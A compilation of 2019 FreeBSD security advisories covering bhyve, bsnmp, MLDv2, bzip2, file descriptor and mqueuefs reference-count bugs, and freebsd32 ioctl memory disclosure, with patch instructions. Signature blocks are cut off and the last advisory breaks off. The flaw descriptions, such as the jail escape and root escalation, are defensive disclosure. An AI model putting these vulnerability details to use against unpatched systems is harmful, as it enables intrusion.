from:"advisories"

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

=
FreeBSD-SA-19:21.bhyve  Security Advisory
  The FreeBSD Project

Topic:  Insufficient validation of guest-supplied data (e1000 device)

Category:   core
Module: bhyve
Announced:  2019-08-06
Credits:Reno Robert
Affects:All supported versions of FreeBSD.
Corrected:  2019-08-05 22:04:16 UTC (stable/12, 12.0-STABLE)
2019-08-06 17:13:17 UTC (releng/12.0, 12.0-RELEASE-p9)
2019-08-05 22:04:16 UTC (stable/11, 11.3-STABLE)
2019-08-06 17:13:17 UTC (releng/11.3, 11.3-RELEASE-p2)
2019-08-06 17:13:17 UTC (releng/11.2, 11.2-RELEASE-p13)
CVE Name:   CVE-2019-5609

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit https://security.FreeBSD.org/>.

I.   Background

bhyve(8) is a hypervisor that supports running a variety of guest operating
systems in virtual machines.  bhyve(8) includes an emulated Intel 82545
network interface adapter ("e1000").

II.  Problem Description

The e1000 network adapters permit a variety of modifications to an Ethernet
packet when it is being transmitted.  These include the insertion of IP and
TCP checksums, insertion of an Ethernet VLAN header, and TCP segmentation
offload ("TSO").  The e1000 device model uses an on-stack buffer to generate
the modified packet header when simulating these modifications on transmitted
packets.

When TCP segmentation offload is requested for a transmitted packet, the
e1000 device model used a guest-provided value to determine the size of the
on-stack buffer without validation.  The subsequent header generation could
overflow an incorrectly sized buffer or indirect a pointer composed of stack
garbage.

III. Impact

A misbehaving bhyve guest could overwrite memory in the bhyve process on the
host.

IV.  Workaround

Only the e1000 device model is affected; the virtio-net device is not
affected by this issue.  If supported by the guest operating system
presenting only the virtio-net device to the guest is a suitable workaround.
No workaround is available if the e1000 device model is required.

V.   Solution

Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date,
and restart any affected virtual machines.

1) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

2) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

# fetch https://security.FreeBSD.org/patches/SA-19:21/bhyve.patch
# fetch https://security.FreeBSD.org/patches/SA-19:21/bhyve.patch.asc
# gpg --verify bhyve.patch.asc

b) Apply the patch.  Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile the operating system using buildworld and installworld as
described in https://www.FreeBSD.org/handbook/makeworld.html>.

Restart the applicable virtual machines, or reboot the system.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path  Revision
- -
stable/12/r350619
releng/12.0/  r350647
stable/11/r350619
releng/11.3/  r350647
releng/11.2/  r350647
- -

To see which files were modified by a particular revision, run the
following command, replacing NN with the revision number, on a
machine with Subversion installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

https://svnweb.freebsd.org/base?view=revision=NN>

VII. References

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5609>

The latest revision of this advisory is available at
https://security.FreeBSD.org/advisories/FreeBSD-SA-19:21.bhyve.asc>
-BEGIN PGP SIGNATURE-

iQKTBAEBCgB9FiEE/A6HiuWv54

FreeBSD Security Advisory FreeBSD-SA-19:20.bsnmp

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

=
FreeBSD-SA-19:20.bsnmp  Security Advisory
  The FreeBSD Project

Topic:  Insufficient message length validation in bsnmp library

Category:   contrib
Module: bsnmp
Announced:  2019-08-06
Credits:Guido Vranken 
Affects:All supported versions of FreeBSD.
Corrected:  2019-08-06 16:11:16 UTC (stable/12, 12.0-STABLE)
2019-08-06 17:12:17 UTC (releng/12.0, 12.0-RELEASE-p9)
2019-08-06 16:12:43 UTC (stable/11, 11.3-STABLE)
2019-08-06 17:12:17 UTC (releng/11.3, 11.3-RELEASE-p2)
2019-08-06 17:12:17 UTC (releng/11.2, 11.2-RELEASE-p13)
CVE Name:   CVE-2019-5610

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit https://security.FreeBSD.org/>.

I.   Background

The bsnmp software library is used for the Internet SNMP (Simple Network
Management Protocol).  As part of this it includes functions to handle ASN.1
(Abstract Syntax Notation One).

II.  Problem Description

A function extracting the length from type-length-value encoding is not
properly validating the submitted length.

III. Impact

A remote user could cause, for example, an out-of-bounds read, decoding of
unrelated data, or trigger a crash of the software such as bsnmpd resulting
in a denial of service.

IV.  Workaround

No workaround is available.

V.   Solution

Perform one of the following:

Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date.

1) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

2) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

# fetch https://security.FreeBSD.org/patches/SA-19:20/bsnmp.patch
# fetch https://security.FreeBSD.org/patches/SA-19:20/bsnmp.patch.asc
# gpg --verify bsnmp.patch.asc

b) Apply the patch.  Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile the operating system using buildworld and installworld as
described in https://www.FreeBSD.org/handbook/makeworld.html>.

Restart all daemons that use the library, or reboot the system.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path  Revision
- -
stable/12/r350637
releng/12.0/  r350646
stable/11/r350638
releng/11.3/  r350646
releng/11.2/  r350646
- -

To see which files were modified by a particular revision, run the
following command, replacing NN with the revision number, on a
machine with Subversion installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

https://svnweb.freebsd.org/base?view=revision=NN>

VII. References

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5610>

The latest revision of this advisory is available at
https://security.FreeBSD.org/advisories/FreeBSD-SA-19:20.bsnmp.asc>
-BEGIN PGP SIGNATURE-

iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAl1Jt1lfFIAALgAo
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEZD
MEU4NzhBRTVBRkU3ODgwMjhENjM1NUQzOTc5MkY0OUVBN0U1QzIACgkQ05eS9J6n
5cKtBBAAltxFzxuMqWCgJoL9SemLRQxGGk0hRFdN5b78mgVdk2lfDgVz8U7mVM6v
XbcCa4lIy7wMYpUdEySAZLR2ENt0xdpx7oQ6lAg5fnnvrUvom4wU9ruxEs5txFVL
K6RaJnQJyOkI2c/LYvI/ZYmuc29/Nt3p/DvVe7wq86taoqUufN11MXkrRHgn68N3
7vewixzWpqH5L/aY2qP1d+Xe3QmHX0IcFqeo4U3/3G4wUGRCfHtaENY4w5eUbCa2
1Qk0oS9iUdX1IJjM5l1ccoFqsjbcO6vNS337qeYNKhLspXMQPwoS0K0HfB6LKt1D
dCBFoXu/qUFjf3qqbpcqGEFrFPZjlNmC4R0Ngx1rfZ1t1dXbj83NOOE1okd3Gb/V
TPDU/jzwt+/6DE6ryNQpeanPdim83w/j+qeA0UaTyxlbj+oSz1gU9Ckaauf+9peI
GT8TPnrgmFlYg2tkYl4tbq5LtRstPGZYguqEt5SHCxBOg3dxByMPzikSFUL9oNxS
9GX7JZT36J20f62hG8Watp2y3W0QsMjJpxF9OojRU6B15Z4Q2aCht4F6DnvEkVfN
1GvS5NAHPHU09TniSgYK3ThkoYrLYykhsXPmJmETV7DU1Qhny1p8H0NwIwB20DEm

FreeBSD Security Advisory FreeBSD-SA-19:19.mldv2

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

=
FreeBSD-SA-19:19.mldv2  Security Advisory
  The FreeBSD Project

Topic:  ICMPv6 / MLDv2 out-of-bounds memory access

Category:   core
Module: net
Announced:  2019-08-06
Credits:CJD of Apple
Affects:All supported versions of FreeBSD.
Corrected:  2019-08-06 17:13:41 UTC (stable/12, 12.0-STABLE)
2019-08-06 17:11:17 UTC (releng/12.0, 12.0-RELEASE-p9)
2019-08-06 17:15:46 UTC (stable/11, 11.3-STABLE)
2019-08-06 17:11:17 UTC (releng/11.3, 11.3-RELEASE-p2)
2019-08-06 17:11:17 UTC (releng/11.2, 11.2-RELEASE-p13)
CVE Name:   CVE-2019-5608

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit https://security.FreeBSD.org/>.

I.   Background

MLDv2 is the Multicast Listener Discovery protocol, version 2.  It is used
by IPv6 routers to discover multicast listeners.

II.  Problem Description

The ICMPv6 input path incorrectly handles cases where an MLDv2 listener
query packet is internally fragmented across multiple mbufs.

III. Impact

A remote attacker may be able to cause an out-of-bounds read or write that
may cause the kernel to attempt to access an unmapped page and subsequently
panic.

IV.  Workaround

No workaround is available.  Systems not using IPv6 are not affected.

V.   Solution

Perform one of the following:

Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date,
and reboot.

1) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install
# shutdown -r +10min "Reboot for security update"

2) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

[FreeBSD 11.2, FreeBSD 11.3]
# fetch https://security.FreeBSD.org/patches/SA-19:19/mldv2.11.patch
# fetch https://security.FreeBSD.org/patches/SA-19:19/mldv2.11.patch.asc
# gpg --verify mldv2.11.patch.asc

[FreeBSD 12.0]
# fetch https://security.FreeBSD.org/patches/SA-19:19/mldv2.12.patch
# fetch https://security.FreeBSD.org/patches/SA-19:19/mldv2.12.patch.asc
# gpg --verify mldv2.12.patch.asc

b) Apply the patch.  Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in
https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the
system.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path  Revision
- -
stable/12/r350648
releng/12.0/  r350644
stable/11/r350650
releng/11.3/  r350644
releng/11.2/  r350644
- -

To see which files were modified by a particular revision, run the
following command, replacing NN with the revision number, on a
machine with Subversion installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

https://svnweb.freebsd.org/base?view=revision=NN>

VII. References

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5608>

The latest revision of this advisory is available at
https://security.FreeBSD.org/advisories/FreeBSD-SA-19:19.mldv2.asc>
-BEGIN PGP SIGNATURE-

iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAl1Jt1RfFIAALgAo
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEZD
MEU4NzhBRTVBRkU3ODgwMjhENjM1NUQzOTc5MkY0OUVBN0U1QzIACgkQ05eS9J6n
5cLzTA/+OyyukXWH7rfwMhOlpD60UH4hxN3purvdNeBe4ZxlYvtf8gSUzS1VbK5r
NR9D2HiYRlmaePOil5myan6cVkrKoANoWTrQsCcsFLe6KKbiKlQDx/btbENmCMsR
VoS0ZPx3l9iGuVUwDk6k1JXwKCcO3U3dCDYEI941hEKxYadR+twUP3JOceg8Zn0h
oODXW7LcPXWQKAyFc0Kun1VrjrUGdRGfqk30joR20GP2IjgQceFHKUbiOyBbbIjW
+UVvp2wPBxXvcXNPTpcIpTW5UGJBHCT2OsDulh7hqpiWf78VE8BoksKAvDjtI4i0
15fmwn7tmQ3aGWK3WoaKWUOXZUlKrxRQDzGyAZ3LzOqPWhv12tJjNJhjnRmCVLfo
+F4I/MHzPgjitZhv8gfn+MRiPG4E1ueAYnPQWiR3qRCLQGhemVdKZIAVnYg6NGpQ
Jgsr1QS8/3GH

FreeBSD Security Advisory FreeBSD-SA-19:18.bzip2

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

=
FreeBSD-SA-19:18.bzip2  Security Advisory
  The FreeBSD Project

Topic:  Multiple vulnerabilities in bzip2

Category:   contrib
Module: bzip2
Announced:  2019-08-06
Affects:All supported versions of FreeBSD.
Corrected:  2019-07-04 07:29:18 UTC (stable/12, 12.0-STABLE)
2019-08-06 17:09:47 UTC (releng/12.0, 12.0-RELEASE-p9)
2019-07-04 07:32:25 UTC (stable/11, 11.3-STABLE)
2019-08-06 17:09:47 UTC (releng/11.3, 11.3-RELEASE-p2)
2019-08-06 17:09:47 UTC (releng/11.2, 11.2-RELEASE-p13)
CVE Name:   CVE-2016-3189, CVE-2019-12900

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit https://security.FreeBSD.org/>.

I.   Background

The bzip2(1)/bunzip2(1) utilities and the libbz2 library compress and
decompress files using an algorithm based on the Burrows-Wheeler transform.
They are generally slower than Lempel-Ziv compressors such as gzip, but
usually provide a greater compression ratio.

The bzip2recover utility extracts blocks from a damaged bzip2(1) file,
permitting partial recovery of the contents of the file.

II.  Problem Description

The decompressor used in bzip2 contains a bug which can lead to an
out-of-bounds write when processing a specially crafted bzip2(1) file.

bzip2recover contains a heap use-after-free bug which can be triggered
when processing a specially crafted bzip2(1) file.

III. Impact

An attacker who can cause maliciously crafted input to be processed
may trigger either of these bugs.  The bzip2recover bug may cause a
crash, permitting a denial-of-service.  The bzip2 decompressor bug
could potentially be exploited to execute arbitrary code.

Note that some utilities, including the tar(1) archiver and the bspatch(1)
binary patching utility (used in portsnap(8) and freebsd-update(8))
decompress bzip2(1)-compressed data internally; system administrators should
assume that their systems will at some point decompress bzip2(1)-compressed
data even if they never explicitly invoke the bunzip2(1) utility.

IV.  Workaround

No workaround is available.

V.   Solution

Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date,
and restart daemons if necessary.

1) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

2) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

# fetch https://security.FreeBSD.org/patches/SA-19:18/bzip2.patch
# fetch https://security.FreeBSD.org/patches/SA-19:18/bzip2.patch.asc
# gpg --verify bzip2.patch.asc

b) Apply the patch.  Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile the operating system using buildworld and installworld as
described in https://www.FreeBSD.org/handbook/makeworld.html>.

Restart all daemons that use the library, or reboot the system.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path  Revision
- -
stable/12/r349717
releng/12.0/  r350643
stable/11/r349718
releng/11.3/  r350643
releng/11.2/  r350643
- -

To see which files were modified by a particular revision, run the
following command, replacing NN with the revision number, on a
machine with Subversion installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

https://svnweb.freebsd.org/base?view=revision=NN>

VII. References

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3189>
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12900>

The latest revision of this advisory is available at
https://security.FreeBSD.org/advisories/FreeBSD-SA-19:18.bzip2.asc>
-BEGIN PGP SIGNATURE--

FreeBSD Security Advisory FreeBSD-SA-19:16.bhyve

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

=
FreeBSD-SA-19:16.bhyve  Security Advisory
  The FreeBSD Project

Topic:  Bhyve out-of-bounds read in XHCI device

Category:   core
Module: bhyve
Announced:  2019-07-24
Credits:Reno Robert
Affects:All supported versions of FreeBSD.
Corrected:  2019-07-23 17:48:37 UTC (stable/12, 12.0-STABLE)
2019-07-24 12:56:06 UTC (releng/12.0, 12.0-RELEASE-p8)
2019-07-23 17:48:37 UTC (stable/11, 11.2-STABLE)
2019-07-24 12:56:06 UTC (releng/11.2, 11.2-RELEASE-p12)
2019-07-24 12:56:06 UTC (releng/11.3, 11.3-RELEASE-p1)
CVE Name:   CVE-2019-5604

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit https://security.FreeBSD.org/>.

I.   Background

bhyve(8) is a hypervisor that supports running a variety of virtual
machines (guests).  bhyve includes an emulated XHCI device.

II.  Problem Description

The pci_xhci_device_doorbell() function does not validate the 'epid' and
'streamid' provided by the guest, leading to an out-of-bounds read.

III. Impact

A misbehaving bhyve guest could crash the system or access memory that
it should not be able to.

IV.  Workaround

No workaround is available, however systems not using bhyve(8) for
virtualization are not vulnerable.

V.   Solution

Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date.

No reboot is required.  Rather the bhyve(8) process for vulnerable virtual
machines should be restarted.

Perform one of the following:

1) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

Restart any bhyve virtual machines or reboot the system.

2) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

# fetch https://security.FreeBSD.org/patches/SA-19:16/bhyve.patch
# fetch https://security.FreeBSD.org/patches/SA-19:16/bhyve.patch.asc
# gpg --verify bhyve.patch.asc

b) Apply the patch.  Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile the operating system using buildworld and installworld as
described in https://www.FreeBSD.org/handbook/makeworld.html>.

Restart any bhyve virtual machines, or reboot the system.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path  Revision
- -
stable/12/r350246
releng/12.0/  r350285
stable/11/r350247
releng/11.2/  r350285
releng/11.3/  r350285
- -

To see which files were modified by a particular revision, run the
following command, replacing NN with the revision number, on a
machine with Subversion installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

https://svnweb.freebsd.org/base?view=revision=NN>

VII. References

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5604>

The latest revision of this advisory is available at
https://security.FreeBSD.org/advisories/FreeBSD-SA-19:16.bhyve.asc>
-BEGIN PGP SIGNATURE-

iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAl04WmtfFIAALgAo
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEZD
MEU4NzhBRTVBRkU3ODgwMjhENjM1NUQzOTc5MkY0OUVBN0U1QzIACgkQ05eS9J6n
5cI+Jw//TcrKrFaXkEJtqzspjoeK9YKwNwj30ewdb/Ph3GdcgVoQmfJVsWPcmcM9
+dewKdl7gGLhVhoJ+3f3oFzlDcqSxFLHcNwSW5J7P8Zt+7ZpQzwH8pfB6S8T1Nk6
77Sv5hYrjy8kdSh6Z/c8BkAQrhEFYO09xej8ekQ1B+iL2N4ErexpCNTMKlP96pGS
0/4tso5gdcwrc1t6HHGffFkjItgnE8Lvgr1ZsSHbcRGAc3nqy3n21U+VH+fecAzK
0NBO3HQeCbRIEdAms3jMLcAJGrs60VBN0nnWqLxlGBb10hY7Si0NkgbWOP2g/Elf
J+K4SHTFXbhIGrpsrEdvSVPvytQ8gKOSys5luvtLjt0Yhll08eEUDVzaIk//Hsak
BcUSlKHULLkVTJZvdZAHUMHJOMPpSAh61DuFcM+pxAt5E9rmgX+HnPBs1yLbgd23
NaQadFC126T+AW5W5GyOs2BIEo4bdTNHqONF7gmR4a5bv6/7GWZz/QNsep43jDZH
43lur9mts+/1LUCD1s4DkMniNMaGt28GMNa44PgQV

FreeBSD Security Advisory FreeBSD-SA-19:17.fd

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

=
FreeBSD-SA-19:17.fd Security Advisory
  The FreeBSD Project

Topic:  File description reference count leak

Category:   core
Module: unix
Announced:  2019-07-24
Credits:Mark Johnston
Affects:All supported versions of FreeBSD.
Corrected:  2019-07-22 19:25:05 UTC (stable/12, 12.0-STABLE)
2019-07-24 12:57:49 UTC (releng/12.0, 12.0-RELEASE-p8)
2019-07-22 19:27:23 UTC (stable/11, 11.2-STABLE)
2019-07-24 12:57:49 UTC (releng/11.2, 11.2-RELEASE-p12)
2019-07-24 12:57:49 UTC (releng/11.3, 11.3-RELEASE-p1)
CVE Name:   CVE-2019-5607

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit https://security.FreeBSD.org/>.

I.   Background

UNIX-domain sockets are used for inter-process communication.  It is
possible to use UNIX-domain sockets to transfer rights, encoded as file
descriptors, to another process.  Rights are encapsulated in control
messages, and multiple such messages may be transmitted with a single
system call.

II.  Problem Description

If a process attempts to transmit rights over a UNIX-domain socket and
an error causes the attempt to fail, references acquired on the rights
are not released and are leaked.  This bug can be used to cause the
reference counter to wrap around and free the corresponding file
structure.

III. Impact

A local user can exploit the bug to gain root privileges or escape from
a jail.

IV.  Workaround

No workaround is available.

V.   Solution

Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date.

Perform one of the following:

1) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install
# shutdown -r +10min "Rebooting for a security update"

2) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

[FreeBSD 11.2]
# fetch https://security.FreeBSD.org/patches/SA-19:17/fd.11.2.patch
# fetch https://security.FreeBSD.org/patches/SA-19:17/fd.11.2.patch.asc
# gpg --verify fd.11.2.patch.asc

[FreeBSD 11.3]
# fetch https://security.FreeBSD.org/patches/SA-19:17/fd.11.patch
# fetch https://security.FreeBSD.org/patches/SA-19:17/fd.11.patch.asc
# gpg --verify fd.11.patch.asc

[FreeBSD 12.0]
# fetch https://security.FreeBSD.org/patches/SA-19:17/fd.12.patch
# fetch https://security.FreeBSD.org/patches/SA-19:17/fd.12.patch.asc
# gpg --verify fd.12.patch.asc

b) Apply the patch.  Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in
https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the
system.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path  Revision
- -
stable/12/r350222
releng/12.0/  r350286
stable/11/r350223
releng/11.2/  r350286
releng/11.3/  r350286
- -

To see which files were modified by a particular revision, run the
following command, replacing NN with the revision number, on a
machine with Subversion installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

https://svnweb.freebsd.org/base?view=revision=NN>

VII. References

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5607>

The latest revision of this advisory is available at
https://security.FreeBSD.org/advisories/FreeBSD-SA-19:17.fd.asc>
-BEGIN PGP SIGNATURE-

iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAl04WnBfFIAALgAo
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEZD
MEU4NzhBRTVBRkU3ODgwMjhENjM1NUQzOTc5MkY0OUVBN0U1QzIACgkQ05eS9J6n
5cIOTQ/+KQMGXwNiuMVNib5ErewD9QdT48NYaU/hYUub3VMAfQltvWmbiPw7zXj7
yJGm9FxWrMvZ6hFnKskV60u9d7PMYkOv4nzcaFgPoadByXXlALQGd/ansrZFyTJr
b

FreeBSD Security Advisory FreeBSD-SA-19:15.mqueuefs

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

=
FreeBSD-SA-19:15.mqueuefs   Security Advisory
  The FreeBSD Project

Topic:  Reference count overflow in mqueue filesystem

Category:   core
Module: kernel
Announced:  2019-07-24
Credits:Mateusz Guzik
Affects:All supported versions of FreeBSD.
Corrected:  2019-07-23 21:12:32 UTC (stable/12, 12.0-STABLE)
2019-07-24 12:55:16 UTC (releng/12.0, 12.0-RELEASE-p8)
2019-07-23 21:15:28 UTC (stable/11, 11.2-STABLE)
2019-07-24 12:55:16 UTC (releng/11.2, 11.2-RELEASE-p12)
2019-07-24 12:55:16 UTC (releng/11.3, 11.3-RELEASE-p1)
CVE Name:   CVE-2019-5603

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit https://security.FreeBSD.org/>.

I.   Background

mqueuefs(5) implements POSIX message queue file system which can be used
by processes as a communication mechanism.

'struct file' represents open files, directories, sockets and other
entities.

II.  Problem Description

System calls operating on file descriptors obtain a reference to
relevant struct file which due to a programming error was not always put
back, which in turn could be used to overflow the counter of affected
struct file.

III. Impact

A local user can use this flaw to obtain access to files, directories,
sockets etc. opened by processes owned by other users.  If obtained
struct file represents a directory from outside of user's jail, it can
be used to access files outside of the jail.  If the user in question is
a jailed root they can obtain root privileges on the host system.

IV.  Workaround

No workaround is available.  Note that the mqueuefs file system is not
enabled by default.

V.   Solution

Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date.

Perform one of the following:

1) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install
# shutdown -r +10min "Security update"

2) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

# fetch https://security.FreeBSD.org/patches/SA-19:15/mqueuefs.patch
# fetch https://security.FreeBSD.org/patches/SA-19:15/mqueuefs.patch.asc
# gpg --verify mqueuefs.patch.asc

b) Apply the patch.  Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in
https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the
system.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path  Revision
- -
stable/12/r350261
releng/12.0/  r350284
stable/11/r350263
releng/11.2/  r350284
releng/11.3/  r350284
- -

To see which files were modified by a particular revision, run the
following command, replacing NN with the revision number, on a
machine with Subversion installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

https://svnweb.freebsd.org/base?view=revision=NN>

VII. References

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5603>

The latest revision of this advisory is available at
https://security.FreeBSD.org/advisories/FreeBSD-SA-19:15.mqueuefs.asc>
-BEGIN PGP SIGNATURE-

iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAl04WmdfFIAALgAo
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEZD
MEU4NzhBRTVBRkU3ODgwMjhENjM1NUQzOTc5MkY0OUVBN0U1QzIACgkQ05eS9J6n
5cIWpBAAg9BmPamkj7wLJODR8SvNk+qYqEbYeakiSGnvXllz2l+qI2dhMVsuQRGQ
ko7VY0P2Wuh68UiiDG63Oq3hbOWPPkL1axk6n275rZSdoVj856tjrHjnUtP3UX5S
WQUKRAREjhVjM9dAOwCYrmAmcpX4SkslklhfiR6AR62t4eptMlfJ6ACQATs6FPnX
WRdyDe7yq0mL4UHWg+PvotQ+rxGiynwgVRMXwaglKOldGOuPOeuj7azM4nb6/qkN
GjJlJOIRwfU1/sXVII3cCzndnCrz5A0sSttg

FreeBSD Security Advisory FreeBSD-SA-19:14.freebsd32

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

=
FreeBSD-SA-19:14.freebsd32  Security Advisory
  The FreeBSD Project

Topic:  Kernel memory disclosure in freebsd32_ioctl

Category:   core
Module: kernel
Announced:  2019-07-24
Credits:Ilja van Sprundel, IOActive
Affects:FreeBSD 11.2 and FreeBSD 11.3
Corrected:  2019-07-22 18:14:34 UTC (stable/11, 11.2-STABLE)
2019-07-24 12:54:10 UTC (releng/11.2, 11.2-RELEASE-p12)
2019-07-24 12:54:10 UTC (releng/11.3, 11.3-RELEASE-p1)
CVE Name:   CVE-2019-5605

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit https://security.FreeBSD.org/>.

I.   Background

The FreeBSD kernel supports executing 32-bit applications on a 64-bit
kernel, including the ioctl(2) interface.

II.  Problem Description

Due to insufficient initialization of memory copied to userland in the
components listed above small amounts of kernel memory may be disclosed
to userland processes.

III. Impact

A user who can invoke 32-bit FreeBSD ioctls may be able to read the
contents of small portions of kernel memory.

Such memory might contain sensitive information, such as portions of the
file cache or terminal buffers.  This information might be directly
useful, or it might be leveraged to obtain elevated privileges in some
way; for example, a terminal buffer might include a user-entered
password.

IV.  Workaround

No workaround is available.

V.   Solution

Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date.

Perform one of the following:

1) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install
# shutdown -r +10min "Security update"

2) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

# fetch https://security.FreeBSD.org/patches/SA-19:14/freebsd32.patch
